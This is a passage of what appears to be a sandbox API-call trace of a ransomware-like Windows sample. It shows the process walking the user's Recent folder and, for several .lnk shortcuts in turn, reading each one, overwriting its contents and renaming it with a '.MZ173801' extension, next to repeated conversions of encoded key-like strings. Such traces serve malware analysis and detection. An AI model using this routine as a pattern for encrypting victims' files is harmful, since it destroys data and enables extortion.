lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.452] GetCurrentThreadId () returned 0x1358 [0111.452] GetCurrentThreadId () returned 0x1358 [0111.452] GetCurrentThreadId () returned 0x1358 [0111.452] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\suu6d.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\suu6d.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.452] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.452] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.452] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x347 [0111.453] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.453] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x347, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x347, lpOverlapped=0x0) returned 1 [0111.453] CloseHandle (hObject=0x3f4) returned 1 [0111.454] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\suu6d.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\suu6d.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.454] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x347, lpOverlapped=0x0) returned 1 [0111.455] CloseHandle (hObject=0x3f4) returned 1 [0111.456] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\suu6d.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\suu6d.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\suu6d.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\suu6d.lnk.mz173801")) returned 1 [0111.456] GetCurrentThreadId () returned 0x1358 [0111.456] GetCurrentThreadId () returned 0x1358 [0111.456] GetCurrentThreadId () returned 0x1358 [0111.719] GetCurrentThreadId () returned 0x1358 [0111.719] GetCurrentThreadId () returned 0x1358 [0111.719] GetCurrentThreadId () returned 0x1358 [0111.719] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76347411, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x76347411, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x76347411, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="T1F3rLNHQkV.lnk", cAlternateFileName="T1F3RL~1.LNK")) returned 1 [0111.719] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.719] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.719] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T1F3rLNHQkV.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t1f3rlnhqkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76347411, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x76347411, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x76347411, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x462)) returned 1 [0111.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.720] GetCurrentThreadId () returned 0x1358 [0111.720] GetCurrentThreadId () returned 0x1358 [0111.720] GetCurrentThreadId () returned 0x1358 [0111.720] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.720] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.720] GetCurrentThreadId () returned 0x1358 [0111.720] GetCurrentThreadId () returned 0x1358 [0111.720] GetCurrentThreadId () returned 0x1358 [0111.720] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T1F3rLNHQkV.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t1f3rlnhqkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.721] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.721] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.721] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x462 [0111.721] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.721] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x462, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x462, lpOverlapped=0x0) returned 1 [0111.722] CloseHandle (hObject=0x3f4) returned 1 [0111.722] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T1F3rLNHQkV.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t1f3rlnhqkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.723] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x462, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x462, lpOverlapped=0x0) returned 1 [0111.724] CloseHandle (hObject=0x3f4) returned 1 [0111.725] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T1F3rLNHQkV.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t1f3rlnhqkv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T1F3rLNHQkV.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t1f3rlnhqkv.lnk.mz173801")) returned 1 [0111.725] GetCurrentThreadId () returned 0x1358 [0111.725] GetCurrentThreadId () returned 0x1358 [0111.725] GetCurrentThreadId () returned 0x1358 [0111.725] GetCurrentThreadId () returned 0x1358 [0111.725] GetCurrentThreadId () returned 0x1358 [0111.725] GetCurrentThreadId () returned 0x1358 [0111.725] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae69f23, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeae69f23, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeae69f23, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3ef, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="T4uSfA p9yNIyW.lnk", cAlternateFileName="T4USFA~1.LNK")) returned 1 [0111.725] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.726] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.726] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T4uSfA p9yNIyW.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\t4usfa p9yniyw.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae69f23, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeae69f23, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeae69f23, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3ef)) returned 1 [0111.726] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.726] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 